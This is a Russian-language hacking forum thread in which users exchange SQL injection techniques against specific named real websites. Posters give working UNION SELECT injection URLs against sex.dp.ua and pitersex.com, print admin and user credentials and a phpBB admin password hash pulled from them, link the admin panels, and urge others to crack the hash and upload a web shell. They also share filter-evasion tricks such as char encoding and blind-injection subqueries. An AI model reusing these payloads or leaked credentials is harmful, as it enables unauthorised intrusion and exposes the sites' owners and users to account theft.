Я и говорю, хекс не катит, а char действует. Просто надо чарить не как в MYSQL... Вот например таблица user, переведённая в char для PostgreSQL. chr(117)||chr(115)||chr(101)||chr(114)
Тьфу,чёрт...А я думал,что это пробел.Это OR чтоль ? Лан,пасип те большое.Завтра попробую...а сейчас сонная дрема меня заберёт(
Так значит вместо кавычек ставить %27? запрос UPDATE+%27auth%27'+SET+usertype=%27admin%27+WHERE+user_id=2
аж смешно,вот ещё одна така скуль Code: http://sex.dp.ua/details.php?id=-5202%20UNION%20SELECT%201,username,3,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20FROM%20admin-- пароли такие же.. admin::root78 http://sex.dp.ua/admin.php юзеров воще не нашол
нет.. ' и %27 - это одно и тоже. и сэкранируется это все все равно. Кроме того сам запрос у тебя неправильный, это бред... такое проканает только в MSSQL, да и то не всегда.. вот так было бы, если бы была MSSQL то есть два запроса сразу идут.. в mysql такое нельзя делать.
а к чему тогда табла admin? и вот ещё такой же сайт, на нём выдрал Code: http://www.pitersex.com/details_news.php?page=1&id=107%20UNION%20SELECT%201,password%20,3,login,5,6,7%20FROM%20users%20-- они тоже не с него? блин,я в этом далёк)
ну а зачем, тогда скуль раскручивать? Чтоб получить шелл или админку хотя бы.. чтоб доступ получить к серву.. а дальше уж решай сам.. что касается админки -это фейк какой то наверное.. левая админка видимо..
Там есть форум phpbb3. можно поглумиться)) А можно и шелл залить: Code: http://www.sex.dp.ua/forum/ http://sex.dp.ua/details.php?id=-5202%20UNION%20SELECT%201,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+information_schema.columns+where+table_name=0x7068706262335F7573657273-- http://sex.dp.ua/details.php?id=-5202%20UNION%20SELECT%201,unhex(hex(concat(username,0x3a,user_password))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+phpbb3_users+limit+2,1-- Сашок - 220778 (юзер с ID=3). http://sex.dp.ua/details.php?id=-5202%20UNION%20SELECT%201,unhex(hex(concat(user_type,0x3a,username,0x3a,user_password))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+phpbb3_users+where+user_type=3+limit+0,1-- 3:admin:$H$7mXvdxG0gVQriTbrzTiSoJAUtMUjEA/ админка здесь: http://www.sex.dp.ua/forum/adm/ Расшифровывай хеш, заливай шелл
Спасибо за ответ. Можно в таком случае привести пример на моем случае. Есть порядка 12к записей. Лимит не работает, просто не выводит данные и я не представляю перебирать лимитов такое количество. p.s. Возможно я туплю, но что-то реальный ступор у меня...
F4R в слепой скуле только подзапросы, читай статьи по скулям, материала куча, практически в любой статье есть описание работы с подзапросами Octave_Parango на каком твоём случае нужно превести пример? Ссылки нет. И что значит лимит не работает? Так не бывает к счастью ). Он просто не может не работать. А дамп базы через скуль, это вобщем никогда не было приятной процедурой(особенно когда вывод по одной записи). Скуль для этого вобщем-то не используют в основном. Через неё получают доступ в админку, или напрямую льют шелл, а потом уже дампят базу
